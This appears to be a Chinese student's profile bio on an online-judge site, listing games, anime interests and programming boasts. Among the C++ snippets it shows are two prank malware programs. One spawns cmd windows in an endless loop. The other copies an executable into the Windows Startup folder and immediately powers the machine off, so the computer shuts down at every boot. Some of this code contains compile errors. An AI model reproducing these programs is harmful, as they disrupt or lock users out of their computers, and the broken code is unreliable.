• Bio

    Typing SVG

    已有

    :name

    光临寒舍


    一个核OJ的老杂鱼,初中牲,自宅警备员,追番人,二次猿,画湿,游戏党,音游人,猫娘喵~

    🎮我玩的游戏

    -- Phigros rks 15.13,橙46.

    
    
    

    -- 原神 原神,启动!(冒险等级35级,金只有一个大保底歪的琴,痛苦号,UID:253569405)

    
    
    

    -- 蔚蓝档案 B.A.爱好者,毕竟作为一名二次元ᕕ(◠ڼ◠)ᕗ(lsp

    
    
    

    📺追番

    老追番人力(不容置疑

    欧尼酱控(啊欧尼酱好可爱啊啊啊啊啊かわいい!♡

    
    

    如开头,也是爱门

    还是波门、凉门、喜门……还有,种门

    ⌨️程序设计

    --我也没懂几种语言,只会HTML, js, java, c#, c++, c, python, css而已(真的

    --能拿得出手的c++代码也没多少,这些是比较好的……
    //第一年学的代码
    #include <iostream>
    #include <cmath>
    using namespace std;
    int main()
    {
        double y;
        int x, m;
        for (y = 1; y >= -1; y -= 0.1)
        {
            m = acos(y) * 10;
            for (x = 1; x < m; x++) cout << " ";
            cout << "*";
            for (;x < 62 - m; x++) cout << " ";
            cout << "*" << endl;
        }
    }
    
    #include <bits/stdc++.h>
    #include <windows.h>
    using namespace std;
    int main()
    {
        while(1)
        {
            system(start cmd);
        }
    }
    

    警告:开机即关机

    #include <stdio.h>
    #include <windows.h>
    #include <shlobj.h>
    #pragma comment(lib, "shell32.lib")
    bool AutoRun_Startup(char *lpszSrcFilePath, char *lpszDestFileName)
    {
        char szStartuppath[MAX_PATH] = { 0 };
        char szDestFilePath[MAX_PATH] = { 0 };
        SHGetSpecialFolderPath(NULL, szStartupPath, CSIDL_STARTUP, TRUE);
        wsprintf(szDestFilePath, "%s\\%s" szStartupPath, lpszDestFileName);
        CopyFile(lpszSrcFilePath, szDestFilePath, FALSE);
        return true;
    }
    int main(int argc, char * argv[])
    {
        AutoRun_Startup("c://main.exe", "main.exe");
        system("shutdown /p");
        return 0;
    }
    

    🎨画湿

    别想了,很烂的

    🗨️讨论区大混子

    Javaの传送门

    C#の传送门1

    C#の传送门2

    其他的自己去讨论区翻!!!

    
    
    

    我在洛谷

    Bilibili

    我在核桃OJ的主页

    我在帅OJ

  • Accepted Problems

  • Recent Activities

    This person is lazy and didn't join any contests or homework.
  • Recent Solutions

    This person is lazy and didn't write any solutions.
  • Stat

  • Rating

Problem Tags

系统测试
1